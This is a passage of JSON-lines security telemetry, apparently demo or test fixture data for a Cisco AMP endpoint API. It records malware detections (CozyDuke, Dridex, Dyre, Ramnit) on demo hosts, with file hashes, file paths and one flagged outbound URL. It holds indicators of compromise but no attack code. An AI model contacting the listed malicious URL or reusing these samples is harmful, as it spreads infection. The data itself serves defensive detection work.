Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295050","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":711000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900023001000,"timestamp":1610704869,"timestamp_nanoseconds":23000000,"date":"2021-01-15T10:01:09+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704869,"start_date":"2021-01-15T10:01:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292782194426000,"timestamp":1610704867,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:01:07+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292782194425864","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208033899741000,"timestamp":1610704866,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208033899741198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":500000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292777899458567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":82000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292773604491269","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":51000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491268","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491267","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":427000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208003834970000,"timestamp":1610704859,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:00:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208003834970125","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292743539720000,"timestamp":1610704858,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292734949785601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254780868919000,"timestamp":1610704856,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:00:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254780868919310","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363247763718000,"timestamp":1610704849,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2457,"scanned_processes":40,"scanned_paths":0,"malicious_detections":0}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254733624279000,"timestamp":1610704845,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:00:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254733624279053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207939410461000,"timestamp":1610704844,"timestamp_nanoseconds":773000000,"date":"2021-01-15T10:00:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207939410460684","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265962459496000,"timestamp":1610704840,"timestamp_nanoseconds":622000000,"date":"2021-01-15T10:00:40+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1460,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892466943623000,"timestamp":1610704839,"timestamp_nanoseconds":336000000,"date":"2021-01-15T10:00:39+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2280,"scanned_processes":41,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207909345690000,"timestamp":1610704837,"timestamp_nanoseconds":4000000,"date":"2021-01-15T10:00:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207909345689611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899987000600,"timestamp":1610704833,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.Ramnit.A","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704833,"start_date":"2021-01-15T10:00:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://benhomelandefit.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":132000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat 
